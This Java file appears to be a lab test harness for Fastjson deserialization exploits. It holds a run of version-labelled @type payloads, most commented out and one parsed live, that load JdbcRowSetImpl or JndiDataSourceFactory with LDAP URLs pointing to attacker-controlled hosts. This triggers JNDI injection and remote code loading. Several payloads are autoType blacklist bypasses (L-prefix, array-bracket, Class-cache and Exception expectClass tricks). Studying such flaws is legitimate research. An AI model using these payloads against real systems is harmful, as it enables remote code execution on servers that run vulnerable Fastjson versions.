package com.llu.vul;


import com.alibaba.fastjson2.JSON;
import com.alibaba.fastjson2.JSONObject;
import com.sun.rowset.JdbcRowSetImpl;
import org.apache.ibatis.datasource.jndi.JndiDataSourceFactory;

public class FastJsonVulTest {
    public static void main(String[] args) {
//        String s = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\"," +
//                "\"DataSourceName\":\"ldap://192.168.142.129:8085/YMLGKzIJ\"," +
//                "\"autoCommit\":false}";
        // 递归调用的
//        String s = "{\"@type\":\"Lcom.sun.rowset.JdbcRowSetImpl;\",\"dataSourceName\":\"ldap://192.168.142.129:8085/JQwoRjuX\",\"autoCommit\":true}";
//        String s = "{\"@type\":\"LLcom.sun.rowset.JdbcRowSetImpl;;\",\"dataSourceName\":\"ldap://192.168.142.129:8085/JQwoRjuX\",\"autoCommit\":true}";
//        1.2.43
//        String s = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl;\",\"dataSourceName\":\"ldap://192.168.142.129:8085/JQwoRjuX\",\"autoCommit\":true}";
//        String s = "[\n" +
//                "    {\n" +
//                "        \"@type\": \"com.sun.rowset.JdbcRowSetImpl\",\n" +
//                "        \"dataSourceName\": \"ldap://192.168.142.129:8085/JQwoRjuX\",\n" +
//                "        \"autoCommit\": true\n" +
//                "    }\n" +
//                "]";
//        String s = "{\"@type\":\"[com.sun.rowset.JdbcRowSetImpl\"[{,\"dataSourceName\":\"ldap://127.0.0.1:1389/g0tvin\",\"autoCommit\":true}";
//          1.2.45
//        String s = "{\"@type\":\"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory\",\"properties\":{\"data_source\":\"ldap://127.0.0.1:1389/g0tvin\"}}";

//          1.2.47
//        String s = "{\n" +
//                "    \"1\": {\n" +
//                "        \"@type\": \"java.lang.Class\", \n" +
//                "        \"val\": \"com.sun.rowset.JdbcRowSetImpl\"\n" +
//                "    }, \n" +
//                "    \"2\": {\n" +
//                "        \"@type\": \"com.sun.rowset.JdbcRowSetImpl\", \n" +
//                "        \"dataSourceName\": \"ldap://127.0.0.1:1389/g0tvin\", \n" +
//                "        \"autoCommit\": true\n" +
//                "    }\n" +
//                "}";
//        1.2.48
        // 关闭safeMode功能
        System.setProperty("fastjson.parser.symbolTableSize", "0");


        //{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://127.0.0.1:1389/g0tvin","autoCommit":true}
//        设置autoType为true
//        System.setProperty("fastjson.parser.autoTypeSupport", "true");
//        // 设置反序列化允许的白名单 // 添加白名单
//        ParserConfig parserConfig = new ParserConfig();
//        parserConfig.addAccept("com.sun.rowset.JdbcRowSetImpl");
        // 1.2.68
        String s = "{\n" +
                "    \"1\": {\n" +
                "        \"@type\": \"java.lang.Exception\", \n" +
                "        \"@type\": \"com.llu.vul.ThrowableTest\"\n" +
                "    }, \n" +
                "    \"2\": {\n" +
                "        \"@type\": \"com.sun.rowset.JdbcRowSetImpl\", \n" +
                "        \"dataSourceName\": \"ldap://127.0.0.1:1389/g0tvin\", \n" +
                "        \"autoCommit\": true\n" +
                "    }\n" +
                "}";



        JSONObject jsonObject = JSON.parseObject(s);
//        new JndiDataSourceFactory()

        System.out.println(jsonObject);
    }
}
